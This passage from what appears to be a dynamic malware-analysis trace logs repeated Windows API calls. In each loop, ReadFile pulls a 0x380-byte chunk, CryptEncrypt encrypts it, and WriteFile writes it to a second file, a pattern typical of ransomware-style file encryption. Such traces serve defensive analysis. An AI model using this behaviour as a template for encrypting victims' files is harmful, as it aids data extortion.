lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.511] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.511] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.512] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.512] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.512] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.512] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.512] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.512] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.512] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.512] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.512] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.512] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.512] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.512] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.513] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.513] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.513] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.513] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.513] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.513] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.513] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.513] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.513] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.513] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.513] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.513] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.513] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.514] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.514] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.514] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.514] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.514] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.514] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.514] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.514] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.514] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.514] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.514] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.514] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.514] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.515] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.515] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.515] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.515] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.515] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.516] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.516] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.516] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.516] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.516] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.516] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.516] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.516] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.516] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.516] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.516] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.516] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.516] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.517] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.517] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.517] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.517] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.517] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.517] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.517] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.517] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.517] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.517] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.517] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.517] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.517] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.518] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.518] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.518] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.518] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.518] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.518] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.518] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.518] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.518] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.518] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.518] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.519] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.519] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.519] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.519] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.519] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.519] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.519] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.519] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.519] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.519] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.520] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.520] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.520] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.520] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.520] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.520] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.520] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.520] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.520] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.520] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.520] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, 